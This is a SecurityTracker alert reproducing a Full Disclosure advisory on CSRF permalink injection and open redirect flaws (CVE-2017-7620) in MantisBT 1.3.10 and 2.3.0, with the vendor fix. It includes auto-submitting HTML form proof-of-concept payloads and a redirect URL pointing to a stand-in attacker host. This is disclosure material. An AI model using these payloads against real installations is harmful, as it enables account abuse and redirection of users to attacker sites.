SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   MantisBT Vendors:   mantisbt.sourceforge.net
MantisBT Input Validation Flaws Let Remote Users Conduct Cross-Site Request Forgery and Open Redirect Attacks
SecurityTracker Alert ID:  1038538
SecurityTracker URL:  http://securitytracker.com/id/1038538
CVE Reference:   CVE-2017-7620   (Links to External Site)
Date:  May 23 2017
Impact:   Modification of system information, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.3.10, 2.3.0; possibly other versions
Description:   Two vulnerabilities were reported in MantisBT. A remote user can conduct cross-site request forgery attacks. A remote user can redirect the target user's browser to an arbitrary site.

A remote user can create a specially crafted HTML page or URL that, when loaded by the target authenticated user, will exploit an input validation flaw in 'string_api.php' and take actions on the target interface acting as the target user.

The vendor was notified on April 9, 2017.

John Page a.k.a hyp3rlinx reported this vulnerability.

The original advisory is available at:

http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt

A remote user can create a URL that, when loaded by the target user, will redirect the target user's browser to an arbitrary site. The 'return' parameter in 'login_page.php' is affected.

A demonstration exploit URL is provided:

https://[target]/bugs/login_page.php?return=/\/[attacker]

Mahmoud Gamal from Seekurity reported this vulnerability.

Impact:   A remote user can take actions on the target system acting as the target authenticated user.

A remote user can cause the target user's browser to be redirected to an arbitrary web site.

Solution:   The vendor has issued a fix (2.4.1).

The vendor advisory is available at:

https://www.mantisbt.org/bugs/changelog_page.php?project=mantisbt&version=2.4.1

Vendor URL:  www.mantisbt.org/bugs/changelog_page.php?project=mantisbt&version=2.4.1 (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [FD] CVE-2017-7620 Mantis Bug Tracker 1.3.10 / v2.3.0 CSRF Permalink Injection

[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
[+] ISR: ApparitionSec



Vendor:
================
www.mantisbt.org



Product:
=========
Mantis Bug Tracker
1.3.10 / v2.3.0


MantisBT is a popular free web-based bug tracking system. It is written in
PHP works with MySQL, MS SQL, and PostgreSQL databases.



Vulnerability Type:
========================
CSRF Permalink Injection



CVE Reference:
==============
CVE-2017-7620



Security Issue:
================
Remote attackers can inject arbitrary permalinks into the mantisbt Web
Interface if an authenticated user visits a malicious webpage.

Vuln code in "string_api.php" PHP file, under mantis/core/ did not account
for supplied backslashes.
Line: 270

# Check for URL's pointing to other domains

if( 0 == $t_type || empty( $t_matches['script'] ) ||
    3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {


    return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';

}



# Start extracting regex matches

$t_script = $t_matches['script'];
$t_script_path = $t_matches['path'];




Exploit/POC:
=============
<form action="
http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP"
method="POST">
<script>document.forms[0].submit()</script>
</form>

OR

<form action="
http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0"
method="POST">
<script>document.forms[0].submit()</script>
</form>



Network Access:
===============
Remote




Severity:
=========
Medium



Disclosure Timeline:
=============================
Vendor Notification: April 9, 2017
Vendor Release Fix: May 15, 2017
Vendor Disclosed: May 20, 2017
May 20, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2017, SecurityGlobal.net LLC